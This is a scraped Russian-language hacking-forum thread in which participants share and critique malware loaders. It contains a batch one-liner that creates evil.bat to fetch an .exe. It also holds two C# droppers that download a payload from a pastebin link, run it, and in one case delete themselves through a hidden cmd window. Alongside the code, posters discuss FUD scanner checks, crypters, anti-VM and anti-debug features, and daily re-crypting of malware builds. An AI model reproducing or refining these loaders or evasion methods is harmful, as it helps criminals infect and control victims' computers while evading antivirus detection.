Пожалуйста, обратите внимание, что пользователь заблокирован
CMD
@ echo >> start iexplore.exe http://www.website.com/ival.exe >> evil.bat
cmd.exe /c evil.bat
Щас после чека на этом сканере будет не фуд :smile4:Он еще и фуд получился:
![]()
Месяц назад не сливал,х#й его знает кто пустил этот слух(либо я слишком везучий),чекнул уник стаб на этом сканнере был фуд,через неделю чекаю,детекты одни и теже.Щас после чека на этом сканере будет не фуд :smile4:
Криво код смотрел.криво написанный лодер
второй файл не скачает тк как уже есть l.exe
using System;
using System.Diagnostics;
using System.Net;
namespace pastebinload
{
class Program
{
public static string p = new WebClient().DownloadString(""); //ссылка на pastebin: raw
public static string d = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + ("\\"); // Путь
static void Main(string[] args)
{
using (var client = new WebClient())
{
try
{
client.DownloadFile(p, d + "\\l.exe"); // Скачиваем и называем файл l.exe
Process proc = Process.Start(d + "\\l.exe"); //Запускаем l.exe
}
catch { }
}
}
}
}
Есть нерезидентные (скачал-запустил и все), а есть резидентные.Ес-но, большинство кодят первый вариант, ибо автолоад=палево=сложнее и т.д. А так, зависит какие задачи. Для говнолокеров достаточно нерезидента , для чего-то серьезного желательно все же не терять комп после ребута.лоадер ведь не записывает себя в аутозагрузку? его задача быть не заметным т.е. не оставлять следов
Я с опаской его юзаю, т.к были прецеденты после чека на нем билда который не куда не сливал. Что оказалось странным, потом увидел еще гневные посты в продажниках от некоторых авторов малвари.Месяц назад не сливал,х#й его знает кто пустил этот слух(либо я слишком везучий),чекнул уник стаб на этом сканнере был фуд,через неделю чекаю,детекты одни и теже.
лоадер ведь не записывает себя в аутозагрузку? его задача быть не заметным т.е. не оставлять следов
using System;
using System.Diagnostics;
using System.Net;
using System.Reflection;
namespace pastebinload
{
class Program
{
public static string p = new WebClient().DownloadString(""); //ссылка на pastebin: raw
public static string d = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + ("\\"); // Путь
private static void Delet()
{
try
{
Process.Start(new ProcessStartInfo
{
Arguments = "/C choice /C Y /N /D Y /T 3 & del \"" +
new FileInfo(new Uri(Assembly.GetExecutingAssembly().CodeBase).LocalPath).Name + "\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd.exe"
}); //выполняет cmd команду на удаление с задежкой в 3сек
}
catch { }
}
static void Main(string[] args)
{
using (var client = new WebClient())
{
try
{
client.DownloadFile(p, d + "\\l.exe"); // Скачиваем и называем файл l.exe
Process proc = Process.Start(d + "\\l.exe"); //Запускаем l.exe
Delet(); //после запуска удаляет сам себя
}
catch { }
}
}
}
}
сорь я думал ты это все в цыкле.Криво код смотрел.
Он и не качает второй файл. Он переименовывает скачанный файл. А после запускает его.
Скрытое содержимое
Ну,у меня подписка на криптор,мне лишь бы лоадер с антивм/дебаггером а криптую сам билд с мальварём я и так,раз в деньЯ с опаской его юзаю, т.к были прецеденты после чека на нем билда который не куда не сливал. Что оказалось странным, потом увидел еще гневные посты в продажниках от некоторых авторов малвари.
Ну и в довесок что мне не нравится это CDN, хз как оно, но ddos-guard.net так себе cdn/
Скантайм фуд - лолОн еще и фуд получился:
![]()
В этом случае чекни мою тему - https://xss.pro/threads/33349/Ну,у меня подписка на криптор,мне лишь бы лоадер с антивм/дебаггером а криптую сам билд с мальварём я и так,раз в день
Бесплатный сыр только в мышеловке.Я с опаской его юзаю, т.к были прецеденты после чека на нем билда который не куда не сливал. Что оказалось странным, потом увидел еще гневные посты в продажниках от некоторых авторов малвари.
некрасиво так пиарится,если честноВ этом случае чекни мою тему - https://xss.pro/threads/33349/![]()
Согласен ,надо было написать человеку в личкунекрасиво так пиарится,если честно
Я имел ввиду лоадер который не палится и не боится как этот слива на вирус тотал,а тут перекриптовывать сам лоадер я не вижу смыслаВ этом случае чекни мою тему - https://xss.pro/threads/33349/![]()